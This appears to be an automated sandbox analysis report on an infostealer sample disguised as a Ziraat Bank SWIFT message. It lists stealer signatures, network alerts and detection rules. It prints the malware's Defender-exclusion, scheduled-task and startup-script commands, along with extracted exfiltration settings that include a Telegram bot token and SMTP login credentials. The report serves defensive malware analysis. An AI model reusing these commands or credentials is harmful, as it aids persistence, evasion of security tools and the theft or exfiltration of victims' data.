34.2.svchost.exe.73f8810.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x65e6d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7de9d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x95ebd:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x6536b:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d39b:$a3: \Google\Chrome\User Data\Default\Login Data 0x953bb:$a3: \Google\Chrome\User Data\Default\Login Data 0x65679:$a4: \Orbitum\User Data\Default\Login Data 0x7d6a9:$a4: \Orbitum\User Data\Default\Login Data 0x956c9:$a4: \Orbitum\User Data\Default\Login Data 0x66471:$a5: \Kometa\User Data\Default\Login Data 0x7e4a1:$a5: \Kometa\User Data\Default\Login Data 0x964c1:$a5: \Kometa\User Data\Default\Login Data
29.2.spadixes.exe.3680000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
34.2.svchost.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
5.2.svchost.exe.6fa8b90.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.8400000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.72a8b90.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
34.2.svchost.exe.7205570.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8440000.16.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.svchost.exe.8200f08.18.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8480000.40.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.2.svchost.exe.8b00000.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8440000.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.svchost.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.svchost.exe.70f8810.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.svchost.exe.70f8810.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.svchost.exe.70f8810.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.svchost.exe.70f8810.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.svchost.exe.70f8810.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.svchost.exe.70f8810.5.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x107294:$a20: get_LastAccessed 0x10ac0d:$a30: set_GuidMasterKey 0x107f6d:$a31: set_username 0x61b71:$a32: set_version 0x79ba1:$a32: set_version 0x91bc1:$a32: set_version 0x60b3e:$a33: get_Clipboard 0x78b6e:$a33: get_Clipboard 0x90b8e:$a33: get_Clipboard 0x60b85:$a34: get_Keyboard 0x78bb5:$a34: get_Keyboard 0x90bd5:$a34: get_Keyboard 0x61d90:$a35: get_ShiftKeyDown 0x79dc0:$a35: get_ShiftKeyDown 0x91de0:$a35: get_ShiftKeyDown 0x1095d4:$a35: get_ShiftKeyDown 0x1095e5:$a36: get_AltKeyDown 0x60bab:$a37: get_Password 0x78bdb:$a37: get_Password 0x90bfb:$a37: get_Password 0x107831:$a37: get_Password
5.2.svchost.exe.70f8810.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x60be1:$a1: get_encryptedPassword 0x78c11:$a1: get_encryptedPassword 0x90c31:$a1: get_encryptedPassword 0x60f1d:$a2: get_encryptedUsername 0x78f4d:$a2: get_encryptedUsername 0x90f6d:$a2: get_encryptedUsername 0x6096e:$a3: get_timePasswordChanged 0x7899e:$a3: get_timePasswordChanged 0x909be:$a3: get_timePasswordChanged 0x60a8f:$a4: get_passwordField 0x78abf:$a4: get_passwordField 0x90adf:$a4: get_passwordField 0x60bf7:$a5: set_encryptedPassword 0x78c27:$a5: set_encryptedPassword 0x90c47:$a5: set_encryptedPassword 0x625c7:$a7: get_logins 0x7a5f7:$a7: get_logins 0x92617:$a7: get_logins 0x62278:$a8: GetOutlookPasswords 0x7a2a8:$a8: GetOutlookPasswords 0x922c8:$a8: GetOutlookPasswords
5.2.svchost.exe.70f8810.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x10b56b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x10b5dd:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x10b667:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x10b6f9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x10b763:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x10b7d5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x10b86b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x10b8fb:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.svchost.exe.70f8810.5.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x108783:$s2: GetPrivateProfileString 0x107dc5:$s3: get_OSFullName 0x61d74:$s5: remove_Key 0x61e0c:$s5: remove_Key 0x79da4:$s5: remove_Key 0x79e3c:$s5: remove_Key 0x91dc4:$s5: remove_Key 0x91e5c:$s5: remove_Key 0x1095b5:$s5: remove_Key 0x10977a:$s5: remove_Key 0x62ac4:$s6: FtpWebRequest 0x7aaf4:$s6: FtpWebRequest 0x92b14:$s6: FtpWebRequest 0x64bbc:$s7: logins 0x66123:$s7: logins 0x66bf2:$s7: logins 0x7cbec:$s7: logins 0x7e153:$s7: logins 0x7ec22:$s7: logins 0x94c0c:$s7: logins 0x96173:$s7: logins
5.2.svchost.exe.70f8810.5.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x64bbc:$s10: logins 0x66123:$s10: logins 0x66bf2:$s10: logins 0x7cbec:$s10: logins 0x7e153:$s10: logins 0x7ec22:$s10: logins 0x94c0c:$s10: logins 0x96173:$s10: logins 0x96c42:$s10: logins 0x10b54d:$s10: logins 0x10babf:$s10: logins 0x10e7be:$s10: logins 0x10e87c:$s10: logins 0x11035e:$s10: logins 0x10bcd3:$s11: credential 0x11065c:$s11: credential 0x60b3e:$g1: get_Clipboard 0x78b6e:$g1: get_Clipboard 0x90b8e:$g1: get_Clipboard 0x60b85:$g2: get_Keyboard 0x78bb5:$g2: get_Keyboard
5.2.svchost.exe.70873c0.8.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.svchost.exe.70873c0.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.svchost.exe.70873c0.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.svchost.exe.70873c0.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.svchost.exe.70873c0.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.svchost.exe.70873c0.8.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x1786e4:$a20: get_LastAccessed 0x17c05d:$a30: set_GuidMasterKey 0x1793bd:$a31: set_username 0xd2fc1:$a32: set_version 0xeaff1:$a32: set_version 0x103011:$a32: set_version 0xd1f8e:$a33: get_Clipboard 0xe9fbe:$a33: get_Clipboard 0x101fde:$a33: get_Clipboard 0xd1fd5:$a34: get_Keyboard 0xea005:$a34: get_Keyboard 0x102025:$a34: get_Keyboard 0xd31e0:$a35: get_ShiftKeyDown 0xeb210:$a35: get_ShiftKeyDown 0x103230:$a35: get_ShiftKeyDown 0x17aa24:$a35: get_ShiftKeyDown 0x17aa35:$a36: get_AltKeyDown 0xd1ffb:$a37: get_Password 0xea02b:$a37: get_Password 0x10204b:$a37: get_Password 0x178c81:$a37: get_Password
5.2.svchost.exe.70873c0.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd2031:$a1: get_encryptedPassword 0xea061:$a1: get_encryptedPassword 0x102081:$a1: get_encryptedPassword 0xd236d:$a2: get_encryptedUsername 0xea39d:$a2: get_encryptedUsername 0x1023bd:$a2: get_encryptedUsername 0xd1dbe:$a3: get_timePasswordChanged 0xe9dee:$a3: get_timePasswordChanged 0x101e0e:$a3: get_timePasswordChanged 0xd1edf:$a4: get_passwordField 0xe9f0f:$a4: get_passwordField 0x101f2f:$a4: get_passwordField 0xd2047:$a5: set_encryptedPassword 0xea077:$a5: set_encryptedPassword 0x102097:$a5: set_encryptedPassword 0xd3a17:$a7: get_logins 0xeba47:$a7: get_logins 0x103a67:$a7: get_logins 0xd36c8:$a8: GetOutlookPasswords 0xeb6f8:$a8: GetOutlookPasswords 0x103718:$a8: GetOutlookPasswords
5.2.svchost.exe.70873c0.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x17c9bb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x17ca2d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x17cab7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x17cb49:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x17cbb3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x17cc25:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x17ccbb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x17cd4b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.svchost.exe.70873c0.8.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x179bd3:$s2: GetPrivateProfileString 0x179215:$s3: get_OSFullName 0xd31c4:$s5: remove_Key 0xd325c:$s5: remove_Key 0xeb1f4:$s5: remove_Key 0xeb28c:$s5: remove_Key 0x103214:$s5: remove_Key 0x1032ac:$s5: remove_Key 0x17aa05:$s5: remove_Key 0x17abca:$s5: remove_Key 0xd3f14:$s6: FtpWebRequest 0xebf44:$s6: FtpWebRequest 0x103f64:$s6: FtpWebRequest 0xd600c:$s7: logins 0xd7573:$s7: logins 0xd8042:$s7: logins 0xee03c:$s7: logins 0xef5a3:$s7: logins 0xf0072:$s7: logins 0x10605c:$s7: logins 0x1075c3:$s7: logins
5.2.svchost.exe.70873c0.8.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0xd600c:$s10: logins 0xd7573:$s10: logins 0xd8042:$s10: logins 0xee03c:$s10: logins 0xef5a3:$s10: logins 0xf0072:$s10: logins 0x10605c:$s10: logins 0x1075c3:$s10: logins 0x108092:$s10: logins 0x17c99d:$s10: logins 0x17cf0f:$s10: logins 0x17fc0e:$s10: logins 0x17fccc:$s10: logins 0x1817ae:$s10: logins 0x17d123:$s11: credential 0x181aac:$s11: credential 0xd1f8e:$g1: get_Clipboard 0xe9fbe:$g1: get_Clipboard 0x101fde:$g1: get_Clipboard 0xd1fd5:$g2: get_Keyboard 0xea005:$g2: get_Keyboard
34.3.svchost.exe.8440000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
34.3.svchost.exe.8440000.18.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 113 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 6340, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3036, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , ProcessId: 7628, ProcessName: wscript.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ProcessId: 6340, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 6340, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f, ProcessId: 3284, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 520, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49705

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", CommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ParentImage: C:\Users\user\AppData\Local\bothsided\spadixes.exe, ParentProcessId: 720, ParentProcessName: spadixes.exe, ProcessCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ProcessId: 5088, ProcessName: svchost.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 5088, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , ProcessId: 6340, ProcessName: TrojanAI.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , ProcessId: 7628, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 6340, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3036, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", CommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ParentImage: C:\Users\user\AppData\Local\bothsided\spadixes.exe, ParentProcessId: 720, ParentProcessName: spadixes.exe, ProcessCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ProcessId: 5088, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\bothsided\spadixes.exe, ProcessId: 720, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs

Suricata Signatures

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T18:27:11.192599+0100	2018141	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.7	49738	TCP
2024-11-28T18:27:15.606360+0100	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.7	49745	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T18:27:11.192599+0100	2037771	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.7	49738	TCP
2024-11-28T18:27:15.606360+0100	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.7	49745	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T18:26:53.571947+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49701	132.226.8.169	80	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T18:27:18.221469+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.7	49753	54.244.188.177	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Windows\System32\alg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7795961032:AAHl2Gyn1IRHeiB38gCoc9MZJfyaE9R5m3s", "Telegram Chatid": "5330396417"}
Source: 5.2.svchost.exe.6f05570.4.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\server02.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	ReversingLabs: Detection: 91%

Multi AV Scanner detection for submitted file

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Windows\System32\alg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49704 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49702 version: TLS 1.2

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000005.00000003.1284856650.00000000080A0000.00000004.00001000.00020000.00000000.sdmp
